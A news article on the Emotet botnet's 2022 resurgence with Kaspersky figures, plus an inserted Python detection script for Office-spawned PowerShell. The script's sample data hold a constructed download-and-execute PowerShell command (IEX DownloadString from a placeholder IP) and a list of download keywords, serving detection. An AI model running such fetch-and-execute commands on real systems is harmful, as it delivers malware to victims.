Emotet botnet rears its ugly head again

By Staff Writer, ITWeb
Johannesburg, 19 Apr 2022

Emotet, a botnet described by Europol as “the most dangerous malware in the world”, showed a global growth of over 200% during March 2022.

This was revealed by telemetry data from Kaspersky, which says the growth indicates that the actors behind the botnet have, for the first time since its comeback in November last year, been taking steps to dramatically increase their malicious activity.

Emotet is not only a botnet; it is also malware capable of extracting different kinds of data, often financial, from infected devices.

Operated by experienced criminals, Emotet has become one of the biggest players in the cyber crime world. Its infrastructure was taken down in January last year in a joint operation by law enforcement agencies from several countries, but the botnet resurfaced in November and has been gradually increasing its activity since.

It has done so first by spreading via Trickbot, a separate botnet, and now on its own by means of malicious spam campaigns.

The number of victims shot up from 2 843 in February 2022 to 9 086 in March, more than three times as many users attacked, says Kaspersky. The number of attacks escalated accordingly, from 16 897 in February to 48 597 in March.

How it works

A typical Emotet infection starts with spam e-mails carrying Microsoft Office attachments that contain a malicious macro.

Using this macro, the attacker executes a malicious PowerShell command to drop and start a module loader, which then communicates with a command-and-control server to download and start further modules.
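The chain described above (Office document, macro, PowerShell, loader, command-and-control) is what a detection engineer looks for in process-creation telemetry: an Office application spawning a scripting host, usually with an obfuscated or base64-encoded command line. The script below is an added example, not code from the article or from Kaspersky. It scans Sysmon-style process-creation events, flags Office parents that spawn PowerShell or another script host, and decodes any `-EncodedCommand` argument (PowerShell accepts any prefix of the switch, such as `-e` or `-enc`, so the check matches on prefix) so the hidden download stage becomes readable. The sample events, the URL and the list of download markers are constructed assumptions for illustration, not observed Emotet indicators.

```python
import base64
import re

# Assumed parent/child sets for the rule (illustrative, not an exhaustive list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Substrings that indicate a download-and-execute stage once the command is visible.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "net.webclient",
                    "invoke-webrequest", "invoke-expression", "iex", "bitstransfer")
ENC_FLAG = "encodedcommand"


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_ps(command):
    """Encode a command the way 'powershell -EncodedCommand' expects (UTF-16-LE, then base64).
    Used here only to build the constructed sample event."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable.
    PowerShell accepts any prefix of the switch (-e, -ec, -enc, ...), so the check is
    'is this switch a prefix of encodedcommand' rather than a fixed spelling."""
    for m in re.finditer(r"(?:^|\s)[-/](\w+)\s+([A-Za-z0-9+/=]+)", cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not ENC_FLAG.startswith(flag):
            continue  # -nop, -w, -ep, -File and similar are not the encoded-command switch
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def analyse_event(event):
    """Flag an Office process spawning a script host; decode the command if it is encoded."""
    parent, child = basename(event["parent"]), basename(event["image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    decoded = decode_encoded_command(event["cmdline"])
    visible = (decoded or event["cmdline"]).lower()
    # Word-boundary match so 'iex' does not fire on unrelated substrings.
    markers = [k for k in DOWNLOAD_MARKERS
               if re.search(rf"(?<![a-z0-9]){re.escape(k)}(?![a-z0-9])", visible)]
    return {
        "parent": parent,
        "child": child,
        "decoded_command": decoded,
        "download_markers": markers,
        "severity": "high" if markers else "medium",
    }


def scan(events):
    """Run the rule over a list of events and return the findings in order."""
    return [f for f in (analyse_event(e) for e in events) if f is not None]


# Constructed stage-one command; 198.51.100.0/24 is a documentation range, not a real host.
STAGE_ONE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/doc/loader.ps1')"

# Constructed Sysmon Event ID 1 style records (parent image, child image, command line).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(STAGE_ONE)},
    {"parent": r"C:\Windows\explorer.exe",          # benign: user-launched PowerShell
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",        # suspicious parent/child, no encoded stage
     "cmdline": "cmd.exe /c echo hello"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",            # benign: print helper spawned by Word
     "cmdline": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"], f["parent"], "->", f["child"],
              f["decoded_command"] or f["download_markers"])
```

The decode step matters because the encoded form hides the download URL and the `IEX` call from a plain string match; the same logic applies whether the child is launched directly by the Office process or through an intermediate `cmd.exe`, which is why both appear in the child set.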

These modules can perform a range of tasks on the infected device. Researchers were able to retrieve and analyse 10 of the 16 modules; most had been used by Emotet in the past in one form or another.

The current version of Emotet can run automated spam campaigns that spread from infected devices across the network. To feed them it harvests e-mails and e-mail addresses from Thunderbird and Outlook, and collects passwords saved in popular Web browsers such as IE, Firefox, Chrome, Safari and Opera in order to gather account credentials for various e-mail clients.

Alexey Shulmin, a security researcher at Kaspersky, says the takedown of the botnet was a significant step towards decreasing threats worldwide, helping to tear apart its network and removing it from the top threat list for more than a year.

“While the number of attacks is not comparable to the previous scale of Emotet’s operations, the change in dynamics points to a significant activation of the botnet’s operators and a high likelihood of this threat spreading further in the coming months,” Shulmin says.
